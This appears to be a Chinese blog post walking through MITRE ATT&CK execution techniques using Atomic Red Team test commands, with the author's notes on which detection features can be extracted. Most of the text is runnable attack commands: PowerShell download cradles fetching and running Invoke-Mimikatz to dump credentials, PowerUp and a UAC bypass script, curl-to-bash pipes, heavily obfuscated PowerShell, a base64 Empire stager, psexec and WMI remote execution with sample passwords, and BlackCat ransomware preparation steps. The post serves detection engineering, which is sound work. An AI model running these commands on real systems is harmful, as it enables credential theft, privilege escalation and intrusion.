Atomic-执行战术

Atomic-执行战术

具体战术概览

execution
T1610
Deploy a container

T1609
Kubernetes Exec Into Container

T1569.002
System Services: Service Execution   系统服务

T1569.001
System Services: Launchctl           系统服务

T1559
Inter-Process Communication          进程间通信

T1559.002
Inter-Process Communication: Dynamic Data Exchange  进程间通信

T1204.003
User Execution: Malicious Image                     用户执行

T1204.002
User Execution: Malicious File                      用户执行

T1106
Native API                                          原生API (排除)                                      

T1059.007
Command and Scripting Interpreter: JavaScript       命令解释器

T1059.006
Command and Scripting Interpreter: Python           命令解释器

T1059.005
Command and Scripting Interpreter: Visual Basic     命令解释器

T1059.004
Command and Scripting Interpreter: Bash             命令解释器

T1059.003
Command and Scripting Interpreter: Windows Command Shell  命令解释器

T1059.002
Command and Scripting Interpreter: AppleScript            命令解释器

T1059.001
Command and Scripting Interpreter: PowerShell              命令解释器

T1047
Windows Management Instrumentation                     Windows管理规范(WMI)

主机模型-系统服务

T1569.002
System Services: Service Execution   系统服务

T1569.001
System Services: Launchctl           系统服务

主机服务-系统服务-服务执行
1. 以服务启动的形式执行命令
sc.exe create artservice binPath= "%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt"

sc.exe start ARTService

sc.exe delete ARTService

2. 使用 psexec 在远程主机上执行命令
psexec.exe \\localhost -u DOMAIN\Administrator -p P@ssw0rd1 -accepteula "C:\Windows\System32\calc.exe"
3. 使用 Impacket psexec. py 脚本在远程主机上执行命令。
psexec.py 'domain/administrator:pxssw0rd1@127.0.0.1' 'whoami'
4. 使用勒索软件 BlackCat 特性在加密之前执行命令
cmd.exe /c "wmic 	csproduct 	get UUID" 
cmd.exe /c "fsutil behavior 	set SymlinkEvaluation R2L:1" 
cmd.exe /c "fsutil behavior set 	SymlinkEvaluation R2R:1"
reg    add    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters    /v MaxMpxCt /d 65535 /t REG_DWORD /f      
copy $pathtoatomicsfolder\T1569.002\bin\PsExec.exe $env:temp
cmd.exe /c "$env:temp\psexec.exe  -accepteula  \\#{targethost} cmd.exe  /c echo "--access-token""
5. 使用 remcom 工具在远程主机上执行命令
remcom.exe \\localhost /user:administrator /pwd:Pxxword1 cmd.exe
6. 使用 Snake 恶意软件进行服务创建
sc.exe create "WerFaultSvc" binPath= "$env:windir\WinSxS\x86_microsoft-windows-errorreportingfaults_31bf3856ad364e35_4.0.9600.16384_none_a13f7e283339a050\WerFault.exe" DisplayName= "WerFault Service" start= auto

主机模型-系统服务-Launchctl

这个场景是针对 Macos 系统进行适配,跟 Linux 环境中的 systemd 是一个意思,可以使用 launchctl 管理 MacOS 服务。

launchctl submit -l #{label_name} -- #{executable_path}

本章不涉及 MacOS 相关测试适配。


主机模型-进程间通信
1. Cobalt Strike Artifact Kit pipe
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 1
2. Cobalt Strike Lateral Movement (psexec_psh) pipe
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 2
3. Cobalt Strike SSH (postex_ssh) pipe
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 3
4. Cobalt Strike post-exploitation pipe (4.2 and later)
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 4
5. Cobalt Strike post-exploitation pipe (before 4.2)
"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 5

目前情况无法很深入的检测主机底层的进程间通信,从外部检测只能做基础的关键字命令匹配,所以此处添加至匹配关键字的高级情报库即可。
namedpipes_executor. exe


主机模型-进程间通信-动态数据交换

根据细节操作,目前同样是无法检测,也无法通过关键字进行匹配检测。


主机模型-用户执行-恶意文件

参考下面链接吧,我看了下里面描述的这 11 种诱导或欺骗用户执行恶意文件都是较为复杂,如果检测需要从多维度操作,其中我发现一个很明显的特征,就是以命令行的形式执行各种下载恶意文件的同时执行恶意代码,就是说这种情况一般都有下载行为,只是使用哪种不同形式的命令去下载恶意文件。

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md

命令行下载特征记录

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)

echo var url = "[https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt], fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript %TEMP%\OSTapGet.js

Invoke-WebRequest http://amtso.eicar.org/PotentiallyUnwanted.exe -OutFile $env:TEMP/PotentiallyUnwanted.exe

Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk"

主机模型-用户执行-恶意镜像

这个其实跟上面阐述的用户执行-恶意文件是一样的,唯一的不同就是下载的文件改成了镜像文件而已。

命令行下载特征记录

IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.003/src/qbot-test.iso" -OutFile "$env:TEMP\qbot-test.iso")
主机模型-原生 API

发现里面执行的这些步第一个是通过 csc. exe 进行编译获得,另外 3 个就是使用 WinPwn 下载对应的 powershell 脚本并执行。

命令行下载特征记录

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystem.ps1')
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystemBind.ps1')
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/NamedPipe/NamedPipeSystem.ps1')

主机模型-命令与脚本解释器-Powershell
1. 下载 powershell 版本 Mimikatz 并执行窃取凭据
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
  • 下载并执行 Invoke-Mimikatz
2. 在本地磁盘种运行 BloodHound 内网渗透工具
  • 简介
    BloodHound 以用图与线的形式,将域内用户、计算机、组、Sessions、ACLs 以及域内所有相关用户、组、计算机、登陆信息、访问控制策略之间的关系更直观的展现在 Red Team 面前进行更便捷的分析域内情况,更快速的在域内提升自己的权限。它也可以使 Blue Team 成员对己方网络系统进行更好的安全检测及保证域的安全性。

BloodHound 通过在域内导出相关信息,在将数据收集后,将其导入 Neo4j 数据库中,进行展示分析。Neo4j 是一款 NOSQL 图形数据库,它将结构化数据存储在网络上而不是表中,Bloodhound 正是利用这种特性加以合理分析,可以更加直观的将数据以节点空间”来表达相关数据。

write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
import-module #{file_path}\SharpHound.ps1
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
3. 使用 Download Cradle 让 Bloodhound 在内存中执行
  • Download Cradles 是什么?
    Download Cradles 是一句话的代码,主要功能是下载远程的额外的其他功能的恶意代码,并执行。

参考: http://wp.blkstone.me/2019/03/what-is-download-cradles/

write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
4. 混淆测试
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))

无法提取特征检测。

5. 使用 PsSendKeys 功能运行 Mimikatz
  • 主要作用是通过 PsSendKeys 运行 mimikatz,执行后,将会自动执行文件资源管理器,记事本和输入代码的操作,最后将展示 mimikatz 转储信息。
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
6. 使用 Invoke-AppPathBypass 脚本绕过 UAC 限制执行命令

AppPathBypass-应用程序路径通过 Powershell 实现 UAC 绕过

参考:
https://zhuanlan.zhihu.com/p/29325846
https://gist.github.com/netbiosX/54a305a05b979e13d5cdffeba5436bcc
https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/

Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
7. 使用 Powershell MsXml COM object 加载 Download Cradle
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','[https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1)',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
8. 使用Powershell XML requests 加载 Download Cradle
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('[https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml)');$Xml.command.a.execute | IEX"
9. 使用 Powershell invoke mshta. exe 调用下载功能加载 Download Cradle
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:[https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct)').Exec();close()"
10. 通过 Powershell 直接使用 Invoke-DownloadCradle
用特权用户打开powershell然后执行Invoke-DownloadCradle.ps1
11. Powershell 无文件脚本执行
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
12. 运行低版本 Powershell 进行攻击
powershell.exe -version 2 -Command Write-Host $PSVersion
13. NTFS 备用数据流访问
Add-Content -Path $env:TEMP\NTFS_ADS.txt -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
14. Powershell 会话创建与使用
New-PSSession -ComputerName $env:COMPUTERNAME
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
15. 使用ATHPowerShellCommandLineParameter 对参数进行变形来执行 powershell
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation C -Execute -ErrorAction Stop
16. 使用 ATHPowerShellCommandLineParameter 对参数进行变形和编码来执行 powershell
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation C -UseEncodedArguments -EncodedArgumentsParamVariation EA -Execute -ErrorAction Stop
17. 使用ATHPowerShellCommandLineParameter 带入EncodedCommand 参数来执行 powershell
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation E -Execute -ErrorAction Stop
18. 使用 ATHPowerShellCommandLineParameter 带入 EncodedCommand 和 UseEncodedArguments 参数和来执行 powershell
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation E -UseEncodedArguments -EncodedArgumentsParamVariation EncodedArguments -Execute -ErrorAction Stop
19. 使用混淆的 Powershell 执行命令
powershell.exe -e  JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==
20. 使用 powershell 调用已知恶意的 Cmdlets
  • 什么是 Cmdlets?
    "Cmdlets" 指的是 PowerShell 中的命令类型。Cmdlet 全称为 "Cmdlet command",是 PowerShell 的一种命令类型,用于执行各种任务和操作。每个 Cmdlet 都代表一个特定的操作,并且具有特定的参数、选项和输出。

在 PowerShell 中使用 Cmdlets 可以帮助用户更快速、高效地完成各种任务,例如管理文件、目录和进程,访问网络资源,配置计算机设置等。Cmdlets 通常由 PowerShell 系统自带的或第三方开发人员编写的脚本文件提供,也可以自行编写。

在某种意义上,我们可以理解这个就是类似 python 中的能够实现某一类功能的库文件,使用的时候导入即可拿来调用,所以这里理解为存在很多 powershell 类型的恶意库。

$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
    "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
    $cmdlets}

特别记录这些恶意的 Cmdlets

"Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord"
21. 从 PowerShellMafia脚本中调用 PowerUp 检查权限提升的途径
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
22. 滥用 nslookup 进行 DNS 查询
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]

主机模型-命令与脚本解释器-AppleScript

Reference: https://github.com/EmpireProject/Empire

osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg=='));\\\" | python &\""

主机模型-命令与脚本解释器-Windows Command Shell
1. 创建并执行批处理脚本
Start-Process $env:TEMP\T1059.003_script.bat
2. 将文本写入到文件并展示出来
echo "Hello from the Windows Command Prompt! " > "%TEMP%\test.bin" & type "%TEMP%\test.bin"
3. 通过 Windows 命令行进行可疑的执行操作
%LOCALAPPDATA:~-3,1%md /c echo Hello, from CMD! > hello.txt & type hello.txt
4. 模拟 BlackByte 勒索软件进行打印轰炸
cmd /c "for /l %x in (1,1,75) do start wordpad.exe /p $env:temp\T1059_003note.txt" | out-null
5. 在命令行中读取内容并执行
cmd /r cmd<PathToAtomicsFolder\T1059.003\src\t1059.003_cmd.cmd

主机模型-命令与脚本解释器-Bash
1. 创建并执行shell脚本
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
chmod +x /tmp/art.sh
sh /tmp/art.sh
2. 命令行下载 shell 脚本并通过管道执行
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
3. 收集 SUID 权限的可执行文件
chmod +x PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
bash PathToAtomicsFolder/T1059.004/src/AutoSUID.sh

参考:
https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh
4. 执行信息搜集工具 LinEnum
chmod +x PathToAtomicsFolder/T1059.004/src/LinEnum.sh
bash PathToAtomicsFolder/T1059.004/src/LinEnum.sh

参考:
https://raw.githubusercontent.com/rebootuser/LinEnum/c47f9b226d3ce2848629f25fe142c1b2986bc427/LinEnum.sh

5. 将脚本放入临时文件
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
6. 查询 shell 脚本执行的结果
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
7. 确认有哪些可用的 shell 环境
cat /etc/shells
8. 无文件执行 shell 脚本
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
9. 混淆命令行脚本
ART=$(echo -n "id" |base64 -w 0)
echo "\$ART=$ART"
echo -n "$ART" |base64 -d |/bin/bash
unset ART
10. 更改登录的 shell 环境
useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
11. 通过环境变量执行 shell 脚本
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/bash
12. 检测命名管道的shell
cd /tmp
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh
ls -la /tmp/art.txt
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh |bash
ls -la /tmp/art.txt

主机模型-命令与脚本解释器-Visual Basic
1. 通过 VB 脚本收集本地计算机信息
cscript PathToAtomicsFolder\T1059.005\src\sys_info.vbs > $env:TEMP\T1059.005.out.txt
2. 将 VBS 代码进行编码后执行
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
3. 通过 VBA 提取内存中的信息
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"

主机模型-命令与脚本解释器-Python
1. 使用 Python 命令行参数模式执行 shell 脚本
which_python=$(which python || which python3 || which python2)
$which_python -c 'import requests;import os;url = "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh";malicious_command = "sh T1059.006-payload -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
2. 通过脚本py的形式执行python
which_python=$(which python || which python3 || which python2)
echo 'import requests' > T1059.006.py
echo 'import os' >> T1059.006.py
echo 'url = "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh"' >> T1059.006.py
echo 'malicious_command = "T1059.006-payload T1059.006.py -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles"' >> T1059.006.py
echo 'session = requests.session()' >> T1059.006.py
echo 'source = session.get(url).content' >> T1059.006.py
echo 'fd = open("T1059.006-payload", "wb+")' >> T1059.006.py
echo 'fd.write(source)' >> T1059.006.py
echo 'fd.close()' >> T1059.006.py
echo 'os.system(malicious_command)' >> T1059.006.py
$which_python T1059.006.py
3. 通过可执行文件的形式执行 python
which_python=$(which python || which python3 || which python2)
echo 'import requests' > T1059.006.py
echo 'import os' >> T1059.006.py
echo 'url = "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh"' >> T1059.006.py
echo 'malicious_command = "T1059.006-payload T1059.006.py -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles"' >> T1059.006.py
echo 'session = requests.session()' >> T1059.006.py
echo 'source = session.get(url).content' >> T1059.006.py
echo 'fd = open("T1059.006-payload", "wb+")' >> T1059.006.py
echo 'fd.write(source)' >> T1059.006.py
echo 'fd.close()' >> T1059.006.py
echo 'os.system(malicious_command)' >> T1059.006.py
$which_python -c 'import py_compile; py_compile.compile("T1059.006.py", "T1059.006.pyc")'
$which_python T1059.006.pyc
4. 使用 Python 的 pyt 模块和 spawn 功能生成 bash 和 sh 环境
which_python=$(which python || which python3 || which python2)
$which_python -c "import pty;pty.spawn('/bin/sh')"
exit
$which_python -c "import pty;pty.spawn('/bin/bash')"
exit

主机模型-命令与脚本解释器-JavaScript
1. 使用 cscript 调用 jscript 搜集本地计算机信息
cscript PathToAtomicsFolder\T1059.007\src\sys_info.js > $env:TEMP\T1059.007.out.txt'
2. 使用 wscript 调用 jscript 搜集本地计算机信息
wscript PathToAtomicsFolder\T1059.007\src\sys_info.js

主机模型-Windows 管理规范(WMI)
1. 使用 WMI 侦察用户
wmic useraccount get /ALL /format:csv
2. 使用 WMI 侦察进程
wmic process get caption,executablepath,commandline /format:csv
3. 使用 WMI 侦察软件
wmic qfe get description,installedOn /format:csv
4. 使用 WMI 侦察远程主机列出服务信息
wmic /node:"127.0.0.1" service where (caption like "%Spooler%")
5. 使用 WMI 执行本地进程
wmic process call create notepad.exe
6. 使用 WMI 执行远程进程
wmic /user:DOMAIN\Administrator /password:P@ssw0rd1 /node:"127.0.0.1" process call create notepad.exe
7. 使用 WMI 查询和编码命令创建进程
powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
8. 使用混淆的 Win32 进程创建一个进程
$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath("Win32_Process"))
$NewClass = $Class.Derive("Win32_Atomic")
$NewClass.Put()
Invoke-WmiMethod -Path Win32_Atomic -Name create -ArgumentList notepad.exe
9. 使用 WMI 执行rundll32
wmic /node:127.0.0.1 process call create "rundll32.exe $env:TEMP\calc.dll StartW"
10. 使用 WMIC 卸载应用程序
wmic /node:"127.0.0.1" product where "name like 'Tightvnc%%'" call uninstall
posted @ 2023-06-06 17:12  皇帽讲绿帽带法技巧  阅读(218)  评论(0编辑  收藏  举报